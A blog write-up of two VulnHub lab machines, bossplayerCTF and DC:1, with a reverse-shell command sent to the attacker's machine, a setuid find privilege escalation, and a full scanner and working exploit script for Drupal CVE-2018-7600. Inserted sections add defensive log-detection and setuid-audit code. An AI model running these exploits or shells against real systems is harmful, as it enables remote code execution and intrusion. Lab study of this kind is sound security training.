DC1 && bossplayer (vulnhub) penetration testing

Preface

bossplayerCTF-vulnhub && DC:1-vulnhub penetration testing

The approach for both boxes is fairly simple, so I am writing them up together.

bossplayerCTF-vulnhub

Before we start

Target IP: 192.168.1.168

Kali IP: 192.168.1.124

Penetration process

Port scan with nmap


First, visit port 80.


In the page source we find an encoded string.


Decoding it gives workinginprogress.php.


The page hints that it can execute commands, so that is the guess to test.


Next, visit robots.txt.


Decoding its contents gives: lol try harder bro

That looks like useless information.

The page found earlier can be used for a reverse shell:

```
?cmd=nc+-e+/bin/sh+192.168.1.124+1234
```


Then escalate privileges with find (it has the setuid bit on this box):

```
find . -exec /bin/sh -p \; -quit
```


DC:1-vulnhub

Before we start

Target IP: 192.168.1.166

Kali IP: 192.168.1.124

Penetration process

Port scan


The target runs Drupal 7, so we test whether CVE-2018-7600 applies.

Scanner script

```python
#!/usr/bin/env python3
# coding: utf-8
import requests
import re

print('###################################')
print('### POC for drupal CVE-2018-7600')
print('###################################')
print('\n')

check_host = {
    'http://192.168.1.166'
}

for host in check_host:
    if host[-1::] != '/':
        host += '/'

    # checking drupal7: poison the password-reset form's render array,
    # then trigger it through the file/ajax callback
    print('\n' + 'checking host: ' + host)
    print('checking drupal 7.x ......')

    url = host + '?q=user/password&name[%23post_render][]=system&name[%23markup]=echo%20pwn!!!&name[%23type]=markup'
    data = {
        'form_id': 'user_pass',
        '_triggering_element_name': 'name'
    }
    r = requests.post(url, data=data, verify=False, timeout=5)

    # the cached (poisoned) form is identified by its form_build_id
    result = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', r.text)

    if result:
        found = result.group(1)
        url = host + '?q=file/ajax/name/%23value/' + found
        data = {'form_build_id': found}
        r = requests.post(url, data=data, verify=False, timeout=5)

        if 'pwn' in r.text:
            print('pwn!!!' + '\n' + host)
        else:
            print('fail')
    else:
        print('fail')

    # checking drupal8: the same bug reached through the registration form's
    # lazy_builder, sent as multipart fields
    print('\n' + 'checking drupal 8.x ......')
    payload = {
        'mail[a][#lazy_builder][0]': (None, 'system'),
        'mail[a][#lazy_builder][1][]': (None, 'echo pwn!!!'),
        'form_id': (None, 'user_register_form')
    }

    headers = {'X-Requested-With': 'XMLHttpRequest'}

    url = host + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
    r = requests.post(url, files=payload, headers=headers, verify=False, timeout=5)

    if 'pwn' in r.text:
        print('pwn!!!' + '\n' + host)
    else:
        print('fail')
```

Then use the exploit:

```python
#!/usr/bin/env python3

import requests
import argparse
from bs4 import BeautifulSoup


def get_args():
    parser = argparse.ArgumentParser(prog="drupa7-CVE-2018-7600.py",
                                     formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=50),
                                     epilog='''
This script will exploit the (CVE-2018-7600) vulnerability in Drupal 7 <= 7.57
by poisoning the recover password form (user/password) and triggering it with
the upload file via ajax (/file/ajax).
''')
    parser.add_argument("target", help="URL of target Drupal site (ex: http://target.com/)")
    parser.add_argument("-c", "--command", default="id", help="Command to execute (default = id)")
    parser.add_argument("-f", "--function", default="passthru", help="Function to use as attack vector (default = passthru)")
    parser.add_argument("-p", "--proxy", default="", help="Configure a proxy in the format http://127.0.0.1:8080/ (default = none)")
    args = parser.parse_args()
    return args


def pwn_target(target, function, command, proxy):
    requests.packages.urllib3.disable_warnings()
    proxies = {'http': proxy, 'https': proxy}
    print('[*] Poisoning a form and including it in cache.')
    # step 1: inject the render-array callback into the password-reset form
    get_params = {'q': 'user/password', 'name[#post_render][]': function, 'name[#type]': 'markup', 'name[#markup]': command}
    post_params = {'form_id': 'user_pass', '_triggering_element_name': 'name', '_triggering_element_value': '', 'opz': 'E-mail new Password'}
    r = requests.post(target, params=get_params, data=post_params, verify=False, proxies=proxies)
    soup = BeautifulSoup(r.text, "html.parser")
    try:
        form = soup.find('form', {'id': 'user-pass'})
        form_build_id = form.find('input', {'name': 'form_build_id'}).get('value')
        if form_build_id:
            print('[*] Poisoned form ID: ' + form_build_id)
            print('[*] Triggering exploit to execute: ' + command)
            # step 2: replay the cached form through the file/ajax callback
            get_params = {'q': 'file/ajax/name/#value/' + form_build_id}
            post_params = {'form_build_id': form_build_id}
            r = requests.post(target, params=get_params, data=post_params, verify=False, proxies=proxies)
            # command output precedes the Drupal ajax JSON in the response body
            parsed_result = r.text.split('[{"command":"settings"')[0]
            print(parsed_result)
    except:
        print("ERROR: Something went wrong.")
        raise


def main():
    print()
    print('=============================================================================')
    print('|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |')
    print('|                                 by pimps                                  |')
    print('=============================================================================\n')

    args = get_args()  # get the cl args
    pwn_target(args.target.strip(), args.function.strip(), args.command.strip(), args.proxy.strip())


if __name__ == '__main__':
    main()
```
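Both scripts above leave a recognisable trace in the web server's access log: a request carrying Drupal render-array keys such as `#post_render` or `#lazy_builder`, followed by a request to the `file/ajax/.../#value/` callback (Drupal 7) or to `user/register?element_parents=.../#value` (Drupal 8). The following Python is an added example, not part of the original post or of either script, that turns those request shapes into a small log detector. The log lines are constructed, the combined-log regex assumes an Apache/nginx combined format, and the tag names are my own.

```python
import re
from typing import List, Optional
from urllib.parse import unquote

# Request-path markers taken from the scanner and exploit above, compared
# after URL-decoding so that %23 / %5B-encoded variants are caught as well.
RENDER_ARRAY_KEYS = ("#post_render", "#lazy_builder", "#markup", "#type")
D7_TRIGGER = re.compile(r"file/ajax/[^/]+/#value/", re.I)
D8_AJAX_TRIGGER = re.compile(r"user/register\?.*element_parents=[^&]*/#value", re.I)

# Apache/nginx "combined" log format (assumption: adjust to your own format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample lines, not a real capture.
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Feb/2020:21:47:15 +0800] "POST /?q=user/password&name%5B%23post_render%5D%5B%5D=system&name%5B%23markup%5D=echo%20pwn!!!&name%5B%23type%5D=markup HTTP/1.1" 200 4312 "-" "python-requests/2.22.0"',
    '192.0.2.10 - - [25/Feb/2020:21:47:16 +0800] "POST /?q=file/ajax/name/%23value/form-AbC123 HTTP/1.1" 200 812 "-" "python-requests/2.22.0"',
    '198.51.100.7 - - [25/Feb/2020:21:48:02 +0800] "GET /?q=node/1 HTTP/1.1" 200 9100 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [25/Feb/2020:21:49:30 +0800] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 200 640 "-" "python-requests/2.22.0"',
]


def classify_request(path: str) -> Optional[str]:
    """Return a detection tag for one request path, or None if it looks benign."""
    decoded = unquote(path)
    if any(key in decoded for key in RENDER_ARRAY_KEYS):
        return "drupalgeddon2-render-array-injection"   # stage 1: poison a form
    if D7_TRIGGER.search(decoded):
        return "drupalgeddon2-d7-ajax-trigger"          # stage 2: replay cached form
    if D8_AJAX_TRIGGER.search(decoded):
        return "drupalgeddon2-d8-ajax-trigger"
    return None


def scan_log(lines) -> List[dict]:
    """Parse combined-format lines and return one record per suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        tag = classify_request(m["path"])
        if tag:
            hits.append({"ip": m["ip"], "ts": m["ts"], "tag": tag, "status": int(m["status"])})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["ip"]} {hit["tag"]} status={hit["status"]}')
```

Two caveats: the Drupal 8 variant carries its `#lazy_builder` keys in the multipart body, which access logs do not record, so only the `element_parents=.../#value` path is visible there; and a stage-2 trigger request from the same source shortly after a stage-1 injection is a much stronger signal than either request alone, so correlate on client IP and timestamp rather than alerting per line.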


Shell obtained. Now upgrade to a proper TTY and look for setuid binaries to escalate with:

```
python -c "import pty; pty.spawn('/bin/bash')"
find -perm -u=s -type f 2>/dev/null
```
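The `find -perm -u=s` listing is exactly what a defender should be reviewing on a regular basis: both boxes in this write-up fall because a binary that has no business being setuid (find on both, exim on DC:1) carries the bit. The following Python is an added example, not part of the original post, that compares such a listing against a known-good baseline and reports anything unexpected; it also includes a live walker that checks the mode bits directly. The baseline set and the sample find output are constructed for illustration and must be replaced with a baseline captured from a trusted build of the same image.

```python
import os
import stat
from typing import Iterable, List

# Constructed baseline: setuid binaries one would expect on a minimal
# Debian-like host. Capture your real baseline from a known-good image.
BASELINE_SUID = {
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping",
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/newgrp",
}

# Constructed sample of what `find / -perm -u=s -type f 2>/dev/null` might
# print on a host where find and exim have been given the setuid bit.
SAMPLE_FIND_OUTPUT = """\
/bin/su
/bin/mount
/usr/bin/find
/usr/bin/passwd
/usr/sbin/exim4
/usr/bin/sudo
"""


def unexpected_suid(find_output: str, baseline: Iterable[str]) -> List[str]:
    """Return setuid paths present in find_output but absent from baseline, sorted."""
    allowed = set(baseline)
    found = {line.strip() for line in find_output.splitlines() if line.strip()}
    return sorted(found - allowed)


def walk_suid(root: str) -> List[str]:
    """Live check: walk root and list regular files whose mode carries S_ISUID."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


if __name__ == "__main__":
    for path in unexpected_suid(SAMPLE_FIND_OUTPUT, BASELINE_SUID):
        print("unexpected setuid binary:", path)
    # On a real host, feed the live listing instead of the sample:
    # print(unexpected_suid("\n".join(walk_suid("/")), BASELINE_SUID))
```

Run the live variant as root from cron or a configuration-management check; a diff against the baseline after every package install is far cheaper than finding out from a CTF-style `find -exec /bin/sh -p` that the bit was there all along.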

find can be used to escalate privileges, and so can exim.

I will only describe the approach here and not repeat the details.

Afterword

DC:1 is the first box I completed on my own, even though it was very simple...

Author: 我是小吴啦
Link: http://yoursite.com/2020/02/25/DC1-bossplayer-vulnhub%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.